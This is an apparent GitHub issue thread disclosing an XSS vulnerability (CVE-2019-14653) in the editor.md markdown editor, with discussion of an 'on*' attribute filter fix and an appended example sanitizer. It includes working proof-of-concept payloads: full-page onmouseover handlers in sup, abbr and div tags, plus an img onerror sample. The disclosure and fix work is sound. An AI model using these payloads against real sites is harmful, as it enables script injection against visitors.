pandao / editor.md

The open source embeddable online markdown editor (component).
http://editor.md.ipandao.com/
MIT License

XSS vulnerability on <abbr> and <sup>. #715

Open Ry0taK opened 5 years ago

Ry0taK commented 5 years ago

Summary

Because there are no attribute filters on the abbr and sup tags, an attacker can trigger XSS on websites that use editor.md.

CVE

CVE-2019-14653

Payloads

This will execute JavaScript when you move the mouse on any part of the page.

<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('sup')">sup</sup>
<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('abbr')">abbr</abbr>

Images

screenshot
BedRemka commented 5 years ago

sup abbr

huntr-helper commented 4 years ago

👋 Hey! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!

alromh87 commented 4 years ago

Hello, while bug bounty hunting this issue I noticed the filter is implemented; you should use

htmlDecode : "|on*"

when starting the editor. This should be the preferred method; that way it protects against code injection in all elements, like divs, img, ..., not just abbr & sup.

XSS can also be achieved with many more elements:

<div style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('div')">div</div>

Sent a PR updating the README to make it clear.

fluix-dev commented 4 years ago

Is there anything else that needs to be done? The PR seems to have been merged.

alromh87 commented 4 years ago

I think this can be closed

alromh87 commented 4 years ago

After looking deeper I realized the filter is ineffective for self-closing tags, will look into it.
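As an added example (not editor.md's own code), the Node.js snippet below models what an "on*" attribute filter such as the htmlDecode "|on*" setting suggested above has to do: drop every attribute whose name starts with "on" from every tag, including the self-closing tags this comment notes the filter first missed. The regexes and the img sample line are assumptions made for teaching; a production sanitizer should be DOM-based rather than regex-based.

```javascript
// Added example (not editor.md's own code): a minimal model of what an
// "on*" attribute filter has to do. It removes every attribute whose name
// starts with "on" from every start tag, including self-closing tags such
// as <img ... />. The regexes below are an assumption for teaching; a
// production sanitizer should be DOM-based rather than regex-based.

// One attribute: a name, optionally followed by = and a quoted/unquoted value.
const ATTR_RE = /\s+([^\s"'>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;

// A start tag or self-closing tag: <name attr="v" ...> or <name attr="v" ... />
// Group 1 = tag name, group 2 = raw attribute text, group 3 = "/" if self-closing.
const TAG_RE = /<([a-zA-Z][a-zA-Z0-9-]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*(\/?)>/g;

// Returns a list of "tag@attribute" entries for every on* attribute found.
function eventHandlerAttrs(html) {
  const found = [];
  for (const tag of html.matchAll(TAG_RE)) {
    for (const attr of tag[2].matchAll(ATTR_RE)) {
      if (attr[1].toLowerCase().startsWith('on')) found.push(`${tag[1]}@${attr[1]}`);
    }
  }
  return found;
}

// Rebuilds each tag without its on* attributes; closing tags and text are untouched.
function stripEventHandlers(html) {
  return html.replace(TAG_RE, (_whole, name, attrs, selfClose) => {
    const kept = [];
    for (const attr of attrs.matchAll(ATTR_RE)) {
      if (attr[1].toLowerCase().startsWith('on')) continue; // drop the handler
      kept.push(attr[0].trim());
    }
    const attrText = kept.length ? ' ' + kept.join(' ') : '';
    return `<${name}${attrText}${selfClose ? ' /' : ''}>`;
  });
}

// Constructed sample: the three payload shapes from this thread plus a
// self-closing <img> tag, the case the thread notes the filter first missed.
const SAMPLE = [
  '<sup style="position:fixed;left:0;top:0;" onmouseover="alert(\'sup\')">sup</sup>',
  '<abbr style="position:fixed;left:0;top:0;" onmouseover="alert(\'abbr\')">abbr</abbr>',
  '<div style="position:fixed;left:0;top:0;" onmouseover="alert(\'div\')">div</div>',
  '<img src="x.png" onerror="alert(\'img\')" />',
].join('\n');

function demo() {
  const cleaned = stripEventHandlers(SAMPLE);
  return { before: eventHandlerAttrs(SAMPLE).length, after: eventHandlerAttrs(cleaned).length, cleaned };
}

console.log(demo()); // before: 4, after: 0
```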

alromh87 commented 4 years ago

Should work properly now